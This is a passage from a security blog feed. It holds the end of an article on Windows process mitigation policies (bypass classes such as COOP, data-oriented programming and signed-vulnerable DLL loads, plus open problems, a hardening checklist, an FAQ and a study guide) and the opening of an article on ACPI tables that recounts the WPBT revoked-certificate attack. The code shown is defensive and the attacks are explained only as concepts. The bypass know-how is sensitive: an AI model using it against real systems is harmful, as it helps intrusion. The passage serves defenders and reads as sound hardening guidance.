    J --&amp;gt;|new front| K[2025 McGarr&lt;br /&gt;kCFG kCET&lt;br /&gt;research]
&lt;p&gt;The honest summary is that three classes of bypass survive a fully-stacked user-mode process today:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Signed-but-vulnerable DLL hijack -- defeats CIG by definition (publisher check, not content check).&lt;/li&gt;
&lt;li&gt;COOP-style chains where the prototypes match the call site -- defeats CFG (coarse-grained) and is not closed by CET because the call/return invariant holds.&lt;/li&gt;
&lt;li&gt;Data-only attacks -- which never violate any control-flow invariant at all, because no control transfer is hijacked.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What is the theoretical limit on what process mitigations can do? That is the next section.&lt;/p&gt;
&lt;h2&gt;13. What process mitigations cannot do&lt;/h2&gt;
&lt;p&gt;The Abadi paper that founded CFI in 2005 [@msr-cfi] is also the paper that establishes CFI&apos;s structural ceiling. CFI is, by construction, a &lt;em&gt;control-flow&lt;/em&gt; property. That is exactly the property a sophisticated attacker can avoid violating.&lt;/p&gt;
&lt;p&gt;The formal claim from Abadi, Budiu, Erlingsson, and Ligatti: enforcement of CFI restricts an attacker to control-flow transfers that respect the static call graph. The paper &lt;em&gt;does not say&lt;/em&gt; every reachable program behavior is benign. CFI says &quot;the attacker&apos;s control flow stays inside the legal CFG.&quot; It does not say &quot;the legal CFG is benign.&quot; Any attack that operates entirely within the legal CFG is invisible to any CFI variant, including CFG, XFG, CET, PAC, and kCFI.&lt;/p&gt;
&lt;p&gt;The lower bound on what an attacker can do &lt;em&gt;while staying inside the legal CFG&lt;/em&gt; is given by data-oriented programming. The canonical paper is &lt;em&gt;Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks&lt;/em&gt; by Hong Hu, Shweta Shinde, Sendroiu Adrian, Zheng Leong Chua, Prateek Saxena, and Zhenkai Liang, all of the National University of Singapore Department of Computer Science [@dop-paper]. The abstract is constructive and devastating: &quot;such attacks are Turing-complete. We present a systematic technique called data-oriented programming (DOP) to construct expressive non-control data exploits.&quot;&lt;/p&gt;

An exploitation technique in which the attacker corrupts non-control data -- authentication flags, length fields, function-table indices, loop bounds -- and lets the program&apos;s own legitimate, unmodified control flow execute the attacker&apos;s intended computation. Hu, Shinde, Adrian, Chua, Saxena, and Liang proved DOP is Turing-complete: any computation can be expressed as a chain of data-only corruptions in a sufficiently-large program [@dop-paper]. No CFI variant -- CFG, XFG, CET shadow stack, ARM PAC, kCFI -- can detect a DOP attack, because no control flow is hijacked.
&lt;p&gt;The mechanism: the attacker corrupts a &lt;code&gt;current_user.is_admin&lt;/code&gt; flag rather than redirecting a function pointer. They corrupt a &lt;code&gt;buffer_len&lt;/code&gt; field to enable a subsequent legitimate write past the allocation&apos;s intended end. They corrupt a &lt;code&gt;next_state&lt;/code&gt; index to drive a state machine through an attacker-chosen path. The program&apos;s own logic, executing every instruction the compiler emitted and following every control transfer the static call graph allows, performs the attack. DOP is, in a precise sense, the program working as designed -- on data the attacker has chosen.&lt;/p&gt;
&lt;p&gt;A second structural limit: process mitigations are &lt;em&gt;per-process&lt;/em&gt;. The kernel has a parallel mitigation surface (kCFG, kCET, HVCI, Secure Kernel, the VBS/Trustlets stack) the per-process policies do not touch [@mcgarr-bhusa25]. The user-mode hardening recipe stops at the syscall boundary. Everything beyond is the kernel&apos;s job. A renderer that is fully hardened can still be the entry point for a kernel privilege escalation if a syscall takes attacker-controlled input and the kernel-side code path has its own bug.&lt;/p&gt;
&lt;p&gt;The third structural limit is the most uncomfortable to state.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Process mitigations harden the exploit chain. They do not fix the bug. The C/C++ memory-safety bug is still there; mitigations just constrain what the attacker can do with it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Matt Miller, then a senior security engineer at the Microsoft Security Response Center, said this in his Black Hat IL 2019 talk. The deck is on GitHub at the Microsoft MSRC Security Research repository, with the load-bearing slide preserved verbatim [@miller-bhil-pdf]:&lt;/p&gt;

~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues. -- Matt Miller, BlueHat IL 2019 [@miller-bhil-pdf]
&lt;p&gt;ZDNet&apos;s contemporaneous coverage extended the claim: &quot;around 70 percent of all the vulnerabilities in Microsoft products addressed through a security update each year are memory safety issues; a Microsoft engineer revealed last week at a security conference; over the last 12 years, around 70 percent of all Microsoft patches were fixes for memory safety bugs&quot; [@zdnet-70percent].&lt;/p&gt;
&lt;p&gt;Seventy percent. For a decade. The mitigations in this article -- CFG, XFG, CET, ACG, CIG, every smaller policy in the enum -- exist precisely because that number was not going down. Each generation raises the cost of weaponizing a memory-safety bug into a working exploit. None of them reduces the rate at which memory-safety bugs are introduced into the codebase in the first place.&lt;/p&gt;

For the kernel-mode side -- kCFG, kCET, HVCI, and the Trustlets that execute in the Virtual Trust Level 1 (VTL1) Secure Kernel layer -- see the *VBS and Trustlets* sibling article in this series. The user-mode and kernel-mode mitigation surfaces are designed to compose: a renderer hardened to the canonical recipe in section 10, syscalling into a kernel hardened with kCFG and kCET, and protected by an HVCI hypervisor, is the layered defense Microsoft&apos;s strategic direction since 2014 has been building toward.
&lt;p&gt;The only ceiling-breaker is to replace the &lt;em&gt;language&lt;/em&gt; (so the bug never exists) or to replace the &lt;em&gt;memory model&lt;/em&gt; (so the bug cannot be turned into a primitive). The two long-term answers are: memory-safe systems languages, principally Rust (Microsoft has been publicly committing to Rust in Windows since 2019 [@msrc-rust-2019]); and capability-hardware platforms like CHERI and ARM MTE, which catch the bug at the dereference rather than the chain.&lt;/p&gt;
&lt;p&gt;Three things have to be true for mitigations to keep buying time:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Each new mitigation closes a specific attack class -- which means a specific bypass class becomes the next research front.&lt;/li&gt;
&lt;li&gt;Each new bypass class must take an attacker longer to develop than it takes Microsoft to ship the next mitigation -- otherwise the curve goes the wrong way.&lt;/li&gt;
&lt;li&gt;The fraction of memory-safety bugs in shipped code has to either stop rising or start falling -- otherwise no number of mitigations stacks fast enough.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Mitigations are a delaying action. The long-term answer is somewhere else. The reader&apos;s belief at this point is no longer &quot;stack enough mitigations and we win.&quot; It is &quot;mitigations have a structural ceiling, and the bug is still there.&quot; If process mitigations have a ceiling, what is Microsoft pivoting toward, and what is the open frontier?&lt;/p&gt;
&lt;h2&gt;14. Open problems&lt;/h2&gt;
&lt;p&gt;Six things are still unsolved -- or, more precisely, six things are partially solved in ways that are documented but visibly imperfect.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Forward-edge CFI without recompilation.&lt;/strong&gt; Binary-rewriting CFI (BinCFI, Mocfi, Lockdown) is not production-grade on Windows. Microsoft&apos;s strategic answer is &quot;recompile first-party code with &lt;code&gt;/guard:cf&lt;/code&gt; and accept that legacy third-party binaries remain unguarded.&quot; That answer is a long-tail problem: the surface of legacy third-party DLLs that load into hardened Windows processes (drivers, COM components, accessibility tools) is large, slow to recompile, and outside Microsoft&apos;s direct control.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Backward-edge protection on pre-CET hardware.&lt;/strong&gt; Microsoft&apos;s pre-CET internal experiment was Return Flow Guard (RFG), a software-implemented per-thread shadow stack maintained by the runtime rather than the CPU. Tencent Xuanwu Lab bypasses came faster than Microsoft could harden RFG [@wiki-cfi]; Microsoft pivoted to wait for Intel CET. Pre-Tiger-Lake (pre-September-2020) Intel hardware and pre-Zen-3 (pre-November-2020) AMD hardware remain unprotected on the backward edge. Enterprises that need backward-edge protection on older hardware have to sandbox in VBS-isolated VMs -- cross-link to the VBS/Trustlets sibling article.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. The JIT-engine compatibility tax under ACG.&lt;/strong&gt; Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip. For short-lived JavaScript (lots of small functions, one-shot pages, ad-network microservices), this is significant. Chrome&apos;s V8 sandbox project (active since 2023) confines V8&apos;s heap to a bounded memory range inside the renderer&apos;s address space (an in-process defense, not an out-of-process JIT boundary), which limits the impact of a JIT-output bug but does not erase the perf cost [@v8-sandbox-blog]. Interpreter-only renderers for low-trust contexts (small pages, ad iframes) are the medium-term direction; the cost is the runtime perf gap to fully-jitted JS.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. ACG plus AV interoperability.&lt;/strong&gt; Defender&apos;s &lt;code&gt;MsMpEng.exe&lt;/code&gt; cannot enable ACG. The scanner engine generates code at runtime: signature compilation routines, emulator bytecode, regex JITs. Migration to interpreted bytecode is partial. This is a permanent compatibility tension between W^X-as-process-invariant and runtime-generated-code-as-a-feature, and it shows up in every AV engine across every vendor (CrowdStrike Falcon, SentinelOne, Symantec), not just Defender.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Signed-but-vulnerable Microsoft DLLs as universal CIG-bypass loaders.&lt;/strong&gt; The Microsoft-signed DLL surface is enormous and historically full of side-effect DLLs. The App Control / WDAC blocklist is reactive. The blocklist publishes quarterly. New signed-but-vulnerable DLLs are found every quarter. This is a permanent residual risk against CIG and the structural reason vendors with sensitive workloads sometimes run with &lt;code&gt;MitigationOptIn&lt;/code&gt; plus a per-process allowlist rather than &lt;code&gt;MicrosoftSignedOnly&lt;/code&gt; plus an unbounded universe.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6. XFG default-on tradeoffs.&lt;/strong&gt; XFG&apos;s instrumentation is in the MSVC binaries; the dispatch thunks are in &lt;code&gt;ntdll.dll&lt;/code&gt;. Enforcement-by-default never shipped. McGarr&apos;s BHUSA 2025 deck names XFG as &quot;deprecated&quot; [@mcgarr-bhusa25]; Microsoft&apos;s strategic direction is hardware-backed CFI (CET shadow stack for the backward edge) plus KCFG / KCET in the kernel. The unsolved question is whether the &lt;em&gt;forward edge&lt;/em&gt; can ever get fine-grained protection without the compatibility cost that killed XFG. Apple&apos;s PAC suggests yes (because the cryptographic key approach has zero compatibility cost on cast); LLVM&apos;s &lt;code&gt;-fsanitize=cfi-icall&lt;/code&gt; suggests yes for code built end-to-end with LTO. Neither has a Windows analog as of 2026.&lt;/p&gt;

Recompile first-party code with `/guard:cf /CETCOMPAT`. Push the kernel hardening (kCFG, kCET, HVCI) forward, since the user-mode surface is mature. Lean on hardware (Intel CET, AMD shadow stack, eventually MTE-on-Windows-on-ARM) rather than software heuristics. Accept that legacy unrecompiled binaries remain unguarded and quarantine them in lower-trust VBS-isolated contexts. That is the strategy McGarr&apos;s 2025 deck implies and that the Defender / Edge / Recall configurations in the section 10 matrix execute [@mcgarr-bhusa25].
&lt;p&gt;Six open problems. The first four are engineering. The last two are structural. The structural ones suggest the next-decade answer is not a better mitigation, but a different memory model: Rust, CHERI, MTE.&lt;/p&gt;
&lt;h2&gt;15. Practical guide: ten steps to ship a hardened binary&lt;/h2&gt;
&lt;p&gt;Concrete. Ten steps. By the end of this checklist, your new sandboxed-parser binary is hardened to the canonical 2026 recipe.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Run &lt;code&gt;dumpbin /headers /loadconfig YourBinary.exe&lt;/code&gt;. Verify the &lt;code&gt;Guard Flags&lt;/code&gt; word is non-zero, that &lt;code&gt;FID Table present&lt;/code&gt; is in the output, and that the &lt;code&gt;Guard CF Function Table&lt;/code&gt; is non-empty [@ms-cfg-doc].&lt;/li&gt;
&lt;li&gt;Compile and link with: &lt;code&gt;/guard:cf&lt;/code&gt; &lt;code&gt;/guard:cfw&lt;/code&gt; &lt;code&gt;/CETCOMPAT&lt;/code&gt; &lt;code&gt;/DYNAMICBASE&lt;/code&gt; &lt;code&gt;/HIGHENTROPYVA&lt;/code&gt; &lt;code&gt;/NXCOMPAT&lt;/code&gt;. The &lt;code&gt;/CETCOMPAT&lt;/code&gt; flag requires Visual Studio 2019 or later and x64 only [@ms-guard-cf-compiler, @ms-guard-cf-linker, @ms-cetcompat].&lt;/li&gt;
&lt;li&gt;Call &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; (or, better, &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt; for child processes) for: &lt;code&gt;ProcessDynamicCodePolicy&lt;/code&gt;, &lt;code&gt;ProcessExtensionPointDisablePolicy&lt;/code&gt;, &lt;code&gt;ProcessImageLoadPolicy&lt;/code&gt; (with &lt;code&gt;NoRemoteImages&lt;/code&gt; plus &lt;code&gt;NoLowMandatoryLabelImages&lt;/code&gt; plus &lt;code&gt;PreferSystem32Images&lt;/code&gt;), &lt;code&gt;ProcessStrictHandleCheckPolicy&lt;/code&gt;, &lt;code&gt;ProcessSystemCallDisablePolicy&lt;/code&gt; (if your process does not draw windows), and &lt;code&gt;ProcessUserShadowStackPolicy&lt;/code&gt; (with &lt;code&gt;EnableUserShadowStack&lt;/code&gt; and, for the most-hardened sandboxes, &lt;code&gt;BlockNonCetBinaries&lt;/code&gt;) [@ms-setprocessmitigationpolicy, @ms-dynamic-code-policy, @ms-image-load-policy, @ms-user-shadow-stack-policy].&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt; rather than post-&lt;code&gt;CreateProcess&lt;/code&gt; policy installation for any child process. This is the single most important step on this list.&lt;/li&gt;
&lt;li&gt;Audit with &lt;code&gt;Set-ProcessMitigation -PolicyFilePath&lt;/code&gt; (Group Policy / Intune deployable XML). The schema and the cmdlet are documented in the Defender Exploit Protection reference [@ms-defender-exploit-protection].&lt;/li&gt;
&lt;li&gt;For sandboxed parsers (PDF, image, video, font), enable &lt;code&gt;ProcessFontDisablePolicy&lt;/code&gt;. Refuse non-system fonts at the per-process layer.&lt;/li&gt;
&lt;li&gt;For signed-component-only processes, enable &lt;code&gt;ProcessSignaturePolicy(MicrosoftSignedOnly)&lt;/code&gt;. Accept that some third-party DLLs will not load and document each gap in your threat model [@ms-binary-signature-policy].&lt;/li&gt;
&lt;li&gt;For browser-class sandboxed children, prohibit child-process creation with &lt;code&gt;ProcessChildProcessPolicy&lt;/code&gt;. Closes the renderer-to-&lt;code&gt;cmd.exe&lt;/code&gt; pivot class.&lt;/li&gt;
&lt;li&gt;Validate the rendered policy at runtime with &lt;code&gt;Get-ProcessMitigation -Name &amp;lt;binary&amp;gt;&lt;/code&gt;. Spot-check that every flag you set in code is reflected in the cmdlet output [@ms-defender-exploit-protection].&lt;/li&gt;
&lt;li&gt;For each policy you &lt;em&gt;cannot&lt;/em&gt; enable, document the structural reason in your threat model. A binary that misses CIG because it depends on third-party COM add-ins is making a deliberate threat-model choice; that choice must be visible to the security review.&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt; closes the race-the-mitigation-window class structurally (section 8, section 12). Every other step on this list is a useful addition. Step 4 is the load-bearing step that lets every other step work as designed. Without it, a peer process in the same security context can disable any of the others between &lt;code&gt;CreateProcess&lt;/code&gt; and the child&apos;s first attempt to install its policies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The composition of the policy bitfield itself is mechanical. Each policy is a small DWORD-sized structure; the mitigation-policy attribute for &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt; packs the relevant flags into a 64-bit &lt;code&gt;MitigationOptions&lt;/code&gt; value plus an optional 64-bit &lt;code&gt;MitigationAuditOptions&lt;/code&gt; value.&lt;/p&gt;

Run this in an elevated PowerShell session, replacing `msedge.exe` with the basename of your binary:&lt;pre&gt;&lt;code&gt;Get-ProcessMitigation -Name msedge.exe |
  Format-List CFG, CETShadowStack, BinarySignature, DynamicCode,
              ExtensionPoint, ImageLoad, StrictHandle, SystemCall,
              ChildProcess, FontDisable, PayloadRestriction,
              SideChannelIsolation, ASLR, DEP
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Each block in the output shows &lt;code&gt;Enable&lt;/code&gt;, &lt;code&gt;Audit&lt;/code&gt;, and the subordinate flag word with its individual boolean fields. Spot-check that every flag your code sets in &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; is reflected as &lt;code&gt;ON&lt;/code&gt; in the cmdlet output, and that any &lt;code&gt;OFF&lt;/code&gt; or &lt;code&gt;NOTSET&lt;/code&gt; cell has a documented structural reason in your threat model [@ms-defender-exploit-protection].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;{`
// Each name is documented in PROCESS_CREATION_MITIGATION_POLICY_* constants
// in winnt.h. The bit positions below match the Microsoft Learn reference.
const POL = {
  // First DWORD: legacy mitigations
  &apos;DEP_ENABLE&apos;:                     0x01n &amp;lt;&amp;lt; 0n,
  &apos;DEP_ATL_THUNK_ENABLE&apos;:           0x01n &amp;lt;&amp;lt; 1n,
  &apos;SEHOP_ENABLE&apos;:                   0x01n &amp;lt;&amp;lt; 2n,
  &apos;FORCE_RELOCATE_IMAGES_ALWAYS_ON&apos;:0x01n &amp;lt;&amp;lt; 8n,
  &apos;HEAP_TERMINATE_ALWAYS_ON&apos;:       0x01n &amp;lt;&amp;lt; 12n,
  &apos;BOTTOM_UP_ASLR_ALWAYS_ON&apos;:       0x01n &amp;lt;&amp;lt; 16n,
  &apos;HIGH_ENTROPY_ASLR_ALWAYS_ON&apos;:    0x01n &amp;lt;&amp;lt; 20n,
  // Second DWORD: modern mitigations (packed at +32)
  &apos;STRICT_HANDLE_CHECKS_ALWAYS_ON&apos;: 0x01n &amp;lt;&amp;lt; 32n,
  &apos;WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON&apos;: 0x01n &amp;lt;&amp;lt; 36n,
  &apos;EXTENSION_POINT_DISABLE_ALWAYS_ON&apos;:   0x01n &amp;lt;&amp;lt; 40n,
  &apos;PROHIBIT_DYNAMIC_CODE_ALWAYS_ON&apos;:     0x01n &amp;lt;&amp;lt; 44n,
  &apos;CONTROL_FLOW_GUARD_ALWAYS_ON&apos;:        0x01n &amp;lt;&amp;lt; 48n,
  &apos;BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON&apos;: 0x01n &amp;lt;&amp;lt; 52n,
  &apos;FONT_DISABLE_ALWAYS_ON&apos;:              0x01n &amp;lt;&amp;lt; 56n,
  &apos;IMAGE_LOAD_NO_REMOTE_ALWAYS_ON&apos;:      0x01n &amp;lt;&amp;lt; 60n,
};&lt;/p&gt;
&lt;p&gt;// Compose the recipe for a sandboxed PDF parser
const enabled = [
  &apos;DEP_ENABLE&apos;,
  &apos;BOTTOM_UP_ASLR_ALWAYS_ON&apos;,
  &apos;HIGH_ENTROPY_ASLR_ALWAYS_ON&apos;,
  &apos;STRICT_HANDLE_CHECKS_ALWAYS_ON&apos;,
  &apos;WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON&apos;,
  &apos;EXTENSION_POINT_DISABLE_ALWAYS_ON&apos;,
  &apos;PROHIBIT_DYNAMIC_CODE_ALWAYS_ON&apos;,
  &apos;CONTROL_FLOW_GUARD_ALWAYS_ON&apos;,
  &apos;BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON&apos;,
  &apos;FONT_DISABLE_ALWAYS_ON&apos;,
  &apos;IMAGE_LOAD_NO_REMOTE_ALWAYS_ON&apos;,
];&lt;/p&gt;
&lt;p&gt;let options = 0n;
for (const name of enabled) options |= POL[name];
console.log(&apos;MitigationOptions = 0x&apos; + options.toString(16).padStart(16, &apos;0&apos;));
console.log(&apos;Policies enabled: &apos; + enabled.length + &apos; of &apos; + Object.keys(POL).length);
`}&lt;/p&gt;
&lt;p&gt;Stack the recipe. Document the gaps. Watch the FAQ below for the common misconceptions you will hit on the way.&lt;/p&gt;
&lt;h2&gt;16. Frequently asked questions&lt;/h2&gt;


On x64 Windows, DEP is unconditionally on for all processes. `ProcessDEPPolicy` in `SetProcessMitigationPolicy` is a 32-bit-only vestigial knob, retained because some 32-bit legacy code is still in production [@ms-setprocessmitigationpolicy]. For new code on x64, you do not need to touch the DEP policy; the only useful per-process refinement is `ProcessASLRPolicy` (specifically `ForceRelocateImages` and `HighEntropy`), to insist on high-entropy randomization even when third-party DLLs were built without `/DYNAMICBASE`.

No. They attack different surfaces. CIG (`ProcessSignaturePolicy`) prohibits *loading unsigned images*. ACG (`ProcessDynamicCodePolicy`) prohibits *generating new executable code at runtime*. An attacker who finds a signed-but-vulnerable DLL bypasses CIG but does not bypass ACG. An attacker who finds a JIT-spray primitive in an in-process JIT bypasses ACG but does not bypass CIG (because they are not loading a new DLL). The two are orthogonal, and a hardened process needs both [@miller-acg-blog, @ms-binary-signature-policy, @ms-dynamic-code-policy].

No. The MSVC `/guard:xfg` flag exists. The `__guard_xfg_dispatch_icall_fptr` thunk exists in `ntdll.dll`. The instrumentation is in some binaries. Enforcement-by-default never shipped, and Connor McGarr&apos;s Black Hat USA 2025 deck describes XFG as &quot;deprecated&quot; [@mcgarr-bhusa25]. Microsoft&apos;s strategic direction is hardware-backed CET shadow stack for the backward edge plus kCFG and kCET in the kernel; fine-grained forward-edge protection on Windows in 2026 means LLVM&apos;s `-fsanitize=cfi-icall` on opted-in builds, not XFG.

Only the return-edge variant. CET shadow stack catches any attempt to corrupt a return address on the regular stack and then return through it [@cet-techcommunity-wayback]. *Call-oriented programming* (COP, chains of `call`-terminated gadgets) and *jump-oriented programming* (JOP, chains of `jmp`-terminated gadgets) preserve the call/return invariant -- the gadgets do not return through corrupted stack frames -- so CET sees nothing. COOP (section 5) chains entire legitimate virtual function calls with matching call/return pairs; CET also sees nothing [@coop-ieeesecurity-pdf]. CET stops *classical* ROP. It does not stop code-reuse exploitation in general.

Because ACG, enabled in Edge in Windows 10 1703 (March 2017), made in-process JIT a `STATUS_DYNAMIC_CODE_BLOCKED` error [@miller-acg-blog]. The Chakra JIT (then later V8 when Edge moved to Chromium) was rearchitected to run in a separate JIT process that compiles JavaScript and ships the compiled code back to the renderer via an authenticated IPC channel plus a signed-section mapping. The renderer maps the signed section read-execute via `MapViewOfFile`; nothing in the renderer ever calls `VirtualAlloc(PAGE_EXECUTE_*)`. Section 8 walks the architecture in detail.

They constrain the exploit chain but do not fix the root-cause bug. Data-oriented attacks (DOP, section 13) are Turing-complete and survive every CFI variant because no control flow is ever hijacked [@dop-paper]. Signed-but-vulnerable DLLs survive CIG. ACG plus CIG closes the *code* dimension on a hardened process, but a sufficiently-determined attacker who finds a write-what-where primitive can still build a data-only exploit chain in any nontrivial program. The long-term answer is memory-safe languages; Microsoft has been publicly committing to Rust in Windows since 2019, and Matt Miller&apos;s BlueHat IL 2019 talk gave the structural justification: &quot;~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues&quot; [@miller-bhil-pdf]. The short-term answer is the recipe in section 15: stack the mitigations, document the gaps, and treat memory-safety as the limit you are working against.

&lt;p&gt;The bug is still there. The exploit is just much harder. The article ends where it began: a renderer process that survived an info-leak-plus-write-what-where chain because six per-process mitigations all held at once. That is what Windows process mitigation policies do.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-process-mitigation-policies&quot; keyTerms={[
  { term: &quot;Process Mitigation Policy&quot;, definition: &quot;A per-process, opt-in security policy installed via SetProcessMitigationPolicy (or, more safely, via UpdateProcThreadAttribute before a child process executes its first user-mode instruction). The PROCESS_MITIGATION_POLICY enum lists twenty-one values (twenty actual policies plus the MaxProcessMitigationPolicy sentinel) as of Windows 11 24H2.&quot; },
  { term: &quot;CFG (Control Flow Guard)&quot;, definition: &quot;Forward-edge CFI. Compiler emits __guard_check_icall_fptr before every indirect call; linker emits a FID table of valid call targets; loader unions FID tables into a per-process bitmap; runtime validator checks the bitmap on every indirect call. /guard:cf requires /DYNAMICBASE.&quot; },
  { term: &quot;XFG (eXtended Flow Guard)&quot;, definition: &quot;Type-hashed forward-edge CFI. A 64-bit prototype hash placed 8 bytes before each function entry; the call site compares against the expected prototype hash. Closes COOP. /guard:xfg flag exists; enforcement-by-default never shipped; deprecated per McGarr BHUSA 2025.&quot; },
  { term: &quot;CET shadow stack&quot;, definition: &quot;Hardware-enforced backward-edge CFI. Every call writes the return address to both the regular stack and a CPU-protected shadow stack; every ret pops both and compares; mismatch raises #CP / STATUS_STACK_BUFFER_OVERRUN. Tiger Lake Sep 2020, AMD Zen 3 Nov 2020.&quot; },
  { term: &quot;ACG (Arbitrary Code Guard)&quot;, definition: &quot;W^X for the entire process. Prohibits VirtualAlloc(PAGE_EXECUTE_*), prohibits VirtualProtect that adds execute permission, requires MapViewOfSection-with-execute to be backed by signed image. Forced browser JITs out of process. Edge 1703 (March 2017).&quot; },
  { term: &quot;CIG (Code Integrity Guard)&quot;, definition: &quot;Only signed images load. ProcessSignaturePolicy with MicrosoftSignedOnly, StoreSignedOnly, or MitigationOptIn. Implemented via User-Mode Code Integrity (UMCI); failed loads return STATUS_INVALID_IMAGE_HASH. Edge 1511 (Nov 2015).&quot; },
  { term: &quot;COOP (Counterfeit Object-Oriented Programming)&quot;, definition: &quot;Schuster, Tendyck, Liebchen, Davi, Sadeghi, Holz, IEEE S&amp;amp;P 2015. Code-reuse attack chaining legitimate C++ virtual function calls via corrupted vtable pointers. First attack class to bypass coarse-grained CFG.&quot; },
  { term: &quot;Data-Oriented Programming (DOP)&quot;, definition: &quot;Hu, Shinde, Adrian, Chua, Saxena, Liang (NUS), IEEE S&amp;amp;P 2016. Turing-complete attack technique that corrupts non-control data (flags, lengths, indices) and lets the program&apos;s own legitimate control flow execute the attacker&apos;s computation. Invisible to every CFI variant.&quot; },
  { term: &quot;UpdateProcThreadAttribute&quot;, definition: &quot;Kernel-installed pre-process-start mitigation policy delivery. Closes the race-the-mitigation-window class (Forshaw + Fratric 2017) by installing policies before the child process executes its first user-mode instruction.&quot; }
]} questions={[
  { q: &quot;Which two MSVC linker flags must both be set for CFG to actually work?&quot;, a: &quot;/GUARD:CF and /DYNAMICBASE. Without /DYNAMICBASE, the linker omits the FID table and CFG is silently a no-op.&quot; },
  { q: &quot;Which kind of control-flow transfer does CET shadow stack protect?&quot;, a: &quot;The backward edge -- returns. It compares the shadow-stack return address against the regular stack on every ret instruction.&quot; },
  { q: &quot;Name two mitigations that close orthogonal attack surfaces on the same process.&quot;, a: &quot;ACG (prohibits dynamic code generation) and CIG (prohibits loading unsigned images). An attacker who solves one still has to solve the other.&quot; },
  { q: &quot;What attack class did COOP introduce, and what was the structural answer?&quot;, a: &quot;COOP chains legitimate C++ virtual function calls via corrupted vtable pointers. The structural answer is fine-grained CFI: XFG (deprecated), LLVM cfi-icall, or ARM PAC.&quot; },
  { q: &quot;Why can Microsoft Defender not enable ACG?&quot;, a: &quot;Defender&apos;s MsMpEng.exe generates scanner code at runtime -- signature compilation routines, emulator bytecode, regex JITs. Enabling ProhibitDynamicCode would crash the engine on its first compile.&quot; },
  { q: &quot;What is the single most important step when launching a hardened child process?&quot;, a: &quot;Use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) at CreateProcess time so the kernel installs mitigation policies before the child&apos;s first user-mode instruction runs. Closes the race-the-mitigation-window class.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>exploit-mitigation</category><category>cfg</category><category>cet</category><category>acg</category><category>cig</category><category>control-flow-integrity</category><category>security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The ACPI Tables That Quietly Secure Your Windows Machine</title><link>https://paragmali.com/blog/the-acpi-tables-that-quietly-secure-your-windows-machine/</link><guid isPermaLink="true">https://paragmali.com/blog/the-acpi-tables-that-quietly-secure-your-windows-machine/</guid><description>Five small ACPI tables -- DMAR, IORT, WSMT, SDEV, WPBT -- form the firmware-OS contract behind VBS, Credential Guard, Kernel DMA Protection, and BitLocker.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows&apos;s strongest security guarantees -- Credential Guard, BitLocker, Kernel DMA Protection, Memory Integrity -- all rest on five small ACPI tables the OEM&apos;s firmware writes before the Windows boot loader runs. Two of them (DMAR / IORT, WSMT) are hard prerequisites for VBS launch; one (SDEV) decides which devices the Secure Kernel may partition; one (WPBT) lets the firmware drop a SYSTEM-privileged binary into Windows on every boot, and accepted revoked certificates until 2021. This article walks each table, the failure families they admit, and the inventory commands to audit them on your own laptop.
&lt;h2&gt;1. A Revoked Cert, A Secured-Core PC, A 52-Byte Table&lt;/h2&gt;
&lt;p&gt;In September 2021, researchers at Eclypsium published a video of a Secured-Core PC -- the most heavily protected Windows configuration money can buy, with Credential Guard, HVCI, BitLocker, and Kernel DMA Protection all enabled -- being silently rooted at boot [@eclypsium-wpbt]. The malicious binary was Authenticode-signed with a Hacking Team code-signing certificate that had been revoked six years earlier. Windows ran it anyway, with SYSTEM privileges, before the user even reached the lock screen. The mechanism was a single ACPI table almost no one outside platform-firmware engineering can name.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Eclypsium researchers wrote: &lt;em&gt;&quot;This issue affects all Windows-based devices going back to Windows 8 when WPBT was first introduced. We have successfully demonstrated the attack on modern, Secured-Core PCs that are running the latest boot protections&quot;&lt;/em&gt; [@eclypsium-wpbt]. Microsoft&apos;s recommended mitigation was not to fix the certificate validator. It was to ask customers to author a Windows Defender Application Control policy that constrains WPBT-injected binaries [@eclypsium-wpbt].&lt;/p&gt;
&lt;/blockquote&gt;
